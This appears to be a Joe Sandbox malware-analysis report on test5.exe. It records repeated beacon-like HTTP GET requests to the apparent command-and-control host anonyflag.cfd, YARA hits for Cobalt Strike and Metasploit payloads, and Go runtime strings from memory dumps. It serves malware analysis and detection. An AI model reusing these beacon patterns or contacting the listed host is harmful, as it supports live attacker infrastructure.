Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49926	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:56 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:56 UTC	876	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:56 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:56 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Q6MRf%2B3riK1Jh4pXBuFPsmKvTwpZ6U3aVqXi3u4TDOkK5GO49MxX%2BAUQ2JRSCiw3ngTlv7aHiKu%2BpUgrcMLPN2YFKfgEcdIlbb7ZGfGC7vLdVqzSlWjXdvSOEe6Uoiv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90eafc3bb9428b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1583&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1831869&cwnd=240&unsent_bytes=0&cid=842869483a541a69&ts=491&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49931	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:58 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:58 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:58 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:58 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sIhu6jM%2B0cL9NI5TYxGlFG7yFSzt01TGll%2FqNhzQ8RWPn0JO2T8hmuzMnYwRE8m17QibNjpQexhzWZ%2FIXIdOWNyD7xiw5db%2FLd1fk2ijUna9guPlBxocr712cikGcOez"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90eb083ec87cee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1996&rtt_var=758&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1433480&cwnd=176&unsent_bytes=0&cid=2311887fd77738b6&ts=511&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49937	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:38:00 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:38:00 UTC	880	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:38:00 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:38:00 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXeN7KPIRpYz1Oq5km9lTpu%2B%2B07tuTKS0F1St1d4v%2BuqGL5F18LFIvW41qiHZAyxw4PcEgJMxeiKgeXHMUBV2UIsjgy4uFGH10X4wAbqZphoPxxds%2B7BOJqWOqM%2B6jVd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90eb13eacc0c7a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1606&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1788120&cwnd=200&unsent_bytes=0&cid=473a83e73a533fe9&ts=501&x=0"

Target ID:	0
Start time:	05:35:56
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\test5.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\test5.exe"
Imagebase:	0x680000
File size:	4'492'800 bytes
MD5 hash:	AC76C4A995ACCB8A1D272CB76C4374EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	15.3%
Signature Coverage:	18.1%
Total number of Nodes:	943
Total number of Limit Nodes:	82

Executed Functions

Function 0068C980 Relevance: 12.9, Strings: 10, Instructions: 385
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

) not in usable address space: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinn, xrefs: 0068D0C5
out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePo, xrefs: 0068CD25
, xrefs: 0068D00F
out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbi, xrefs: 0068CD36
memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to pallocChunkBytesruntime: failed to create new , xrefs: 0068D0F2
base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-c, xrefs: 0068CFF1
arena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p , xrefs: 0068CD47
out of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResume, xrefs: 0068CD58
region exceeds uintptr range/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: m, xrefs: 0068CFC7
end outside usable address spaceGCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremo, xrefs: 0068D01F

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: $) not in usable address space: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinn$arena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p $base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-c$end outside usable address spaceGCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremo$memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to pallocChunkBytesruntime: failed to create new $out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePo$out of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResume$out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbi$region exceeds uintptr range/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: m
API String ID: 0-3600667164
Opcode ID: 2c8592fce67afc5a58f5864966229cd646a48f7a9a0a7ec761bace7ce94c4b03
Instruction ID: 231cb8ac6cbf5057f376ff992f29b284c0b5f6297b3f5162ba44f51b5e3b565b
Opcode Fuzzy Hash: 2c8592fce67afc5a58f5864966229cd646a48f7a9a0a7ec761bace7ce94c4b03
Instruction Fuzzy Hash: FB029972209B8481DBA0EB56F4407AAA766F789BA0F448226EFDD57799CF3CC484C750

Function 006B25C0 Relevance: 12.7, Strings: 10, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runtime: NtCreateWaitCompletionPacket failed; errno=casfrom_Gscanstatus: gp->status is not in scan statenon-concurrent sweep failed to drain all sweep queuesruntime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS thr, xrefs: 006B2997
bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchwrong timers152587890625762939453125invalid slothost is downillegal , xrefs: 006B290A
CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal App, xrefs: 006B2A1F, 006B2A7F
NtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 , xrefs: 006B29BF
runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownreflect: internal error: invalid method indexcontext: internal error: missing ca, xrefs: 006B29F7, 006B2A57
VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inconsistent bp entersyscallblock inconsistent sp runtime: g is running but p is notinvalid timer channel: no capacity3552713678800500929355, xrefs: 006B296F
0, xrefs: 006B281A
runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625cannot exec a shared library directlyv, xrefs: 006B2ADF
runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownreflect: internal error: invalid me, xrefs: 006B2AB7
runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 006B2947

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: 0$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal App$NtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 $VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inconsistent bp entersyscallblock inconsistent sp runtime: g is running but p is notinvalid timer channel: no capacity3552713678800500929355$bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchwrong timers152587890625762939453125invalid slothost is downillegal $runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownreflect: internal error: invalid me$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625cannot exec a shared library directlyv$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownreflect: internal error: invalid method indexcontext: internal error: missing ca$runtime: NtCreateWaitCompletionPacket failed; errno=casfrom_Gscanstatus: gp->status is not in scan statenon-concurrent sweep failed to drain all sweep queuesruntime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS thr$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
API String ID: 0-595098893
Opcode ID: 2e983b30753b70251fc1161e55a0d08891b7a8997f9e960b1f4103545c767d95
Instruction ID: d01d8ddc33587b9d32de6480879b696699d6ddf86a6e3f71886ab5ba702e7c92
Opcode Fuzzy Hash: 2e983b30753b70251fc1161e55a0d08891b7a8997f9e960b1f4103545c767d95
Instruction Fuzzy Hash: C2C1BE72208B8585DB50EB25F48539E77A6F74AB80F40822AEEDC43BA6DF39C185C754

Function 006B0D80 Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

bcryptprimitives.dll, xrefs: 006B0D99
NtCreateWaitCompletionPacket, xrefs: 006B0E74
RtlGetVersion, xrefs: 006B0F8D
NtCreateWaitCompletionPacket exists but NtCancelWaitCompletionPacket does notMapIter.Next called on an iterator that does not have an associated map Valuecannot convert slice with length %y to array or pointer to array with length %xNtCreateWaitCompletionPacke, xrefs: 006B0FCE
RtlGetCurrentPeb, xrefs: 006B0F4E
bcryptprimitives.dll not foundpanic called with nil argumentcheckdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer found on stack locals stack map entries for abi mismatch detected between runtime: impossible , xrefs: 006B1005
ProcessPrng, xrefs: 006B0DE9
NtAssociateWaitCompletionPacket, xrefs: 006B0EB9
NtCancelWaitCompletionPacket, xrefs: 006B0EFE
ntdll.dll, xrefs: 006B0E27

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: NtAssociateWaitCompletionPacket$NtCancelWaitCompletionPacket$NtCreateWaitCompletionPacket$NtCreateWaitCompletionPacket exists but NtCancelWaitCompletionPacket does notMapIter.Next called on an iterator that does not have an associated map Valuecannot convert slice with length %y to array or pointer to array with length %xNtCreateWaitCompletionPacke$ProcessPrng$RtlGetCurrentPeb$RtlGetVersion$bcryptprimitives.dll$bcryptprimitives.dll not foundpanic called with nil argumentcheckdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer found on stack locals stack map entries for abi mismatch detected between runtime: impossible $ntdll.dll
API String ID: 0-833950751
Opcode ID: 890156123fe27e68fba9030029304e2ddc4b02370866048d1bbcdba6f6433784
Instruction ID: f6b783caaf7cf88d93d282e337f6def0f9a47c087ef3b26b5a3eb7db22403188
Opcode Fuzzy Hash: 890156123fe27e68fba9030029304e2ddc4b02370866048d1bbcdba6f6433784
Instruction Fuzzy Hash: 8A614571206F48C5FB51DF15E8443AA7BAAF749780F48813AEA9C437A6EF79C498C700

Function 006E464C Relevance: 8.1, Strings: 6, Instructions: 589COMMON

Download Yara Rule

Strings

VC, xrefs: 006E4FC5
malloc deadlockruntime error: with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = requested skip=bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]mo, xrefs: 006E4FA8
mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= , xrefs: 006E4F86
malloc during signalclose of nil channelinconsistent lockedmnotetsleep not on g0bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=, xrefs: 006E4F97
mallocgc called with gcphase == _GCmarkterminationruntime.Pinner: object was allocated into an arenaruntime.Pinner: decreased non-existing pin counterrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCal, xrefs: 006E4FB9
!"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 006E49B3

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
